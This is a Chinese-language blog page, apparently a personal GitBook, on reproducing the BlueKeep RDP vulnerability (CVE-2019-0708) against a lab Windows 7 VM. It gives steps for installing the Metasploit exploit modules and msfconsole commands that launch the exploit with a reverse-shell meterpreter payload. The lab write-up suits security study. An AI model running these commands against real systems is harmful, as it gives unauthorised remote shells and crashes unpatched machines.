wang kun' book
  • 目录
  • 环境配置
    • 2019年
      • Cobalt Strike kail的安装
      • vps配置ngrok反向代理
  • CTF WEB
    • 2019年
      • Spring boot SSTI
      • XML中XXE漏洞
        • XML和XXE基础
  • CTF Misc
    • 记一次PNG中的隐写
  • 渗透工具
    • Netcat
    • Metasploit
      • Untitled
      • Msfvenom常用payload
    • CobaltStrike生成windows木马
    • vps部署自动化src挖掘
    • SET社会工程工具包
  • 漏洞复现
    • CVE-2019-0708获取shell
  • hexo github搭建博客
    • 一. Hexo搭建个人博客
    • 二.Hexo添加主题
    • Hexo下的站点配置文件
    • 自定义主题
Powered by GitBook
On this page
  • 1.前言
  • 2.环境准备
  • 2.1 安装win7镜像
  • 2.2 开启3389端口
  • 2.3 配置msf,将exp放置到msf对应文件夹下
  • 3.漏洞复现
  • 4.注意事项
  • 5.Reference

Was this helpful?

  1. 漏洞复现

CVE-2019-0708获取shell

今天二狗子一早就叫我去看0708,我就知道这小子复现出东西了。寻声赶紧追上跑远的二狗子

Previous漏洞复现Next一. Hexo搭建个人博客

Last updated 5 years ago

Was this helpful?

1.前言

CVE-2019-0708这个漏洞最早爆出是在今年5月份,随后微软发布了本月安全更新补丁,其中修复了远程桌面协议(RDP)远程代码执行漏洞。未经身份验证的攻击者利用该漏洞,向目标Windows主机发送恶意构造请求,可以在目标系统上执行任意代码。

2.环境准备

镜像:win7 sp1 ; kali

exp : 提取码:dxqn

2.1 安装win7镜像

2.2 开启3389端口

2.3 配置msf,将exp放置到msf对应文件夹下

0708需要最新的v5框架
apt-get update
apt-get install metasploit-framework

选择相对应的安装目录
rdp.rb放到/usr/share/metasploit-framework/lib/msf/core/exploit 目录
rdp_scanner.rb和cve_2019_0708_bluekeep.rb放到/usr/share/metasploit-framework/modules/auxiliary/scanner/rdp 目录
cve_2019_0708_bluekeep_rce.r放进/usr/share/metasploit-framework/modules/exploits/windows/rdp 目录,这里需要注意如果没有rdp这个目录就去创建个。

3.漏洞复现

root@kali:~# msfconsole
msf5 > reload_all #           加载0708exp
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > use exploit/windows/cve_2019_0708_bluekeep_rce
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set rhosts 192.168.200.119
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set payload windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target 2
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run

4.注意事项

  • 开始的几次可能一直蓝屏而且获取不到shell,多试几次就好了。

  • set target 设置为2,target是主机架构。target 3 是设置vm,但我target3 只弄出了蓝屏,target 2才有反弹shell

5.Reference

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708
https://github.com/rapid7/metasploit-framework/pull/12283/files
https://pan.baidu.com/s/1p5hAmG1fApwN7QaGBOMCyw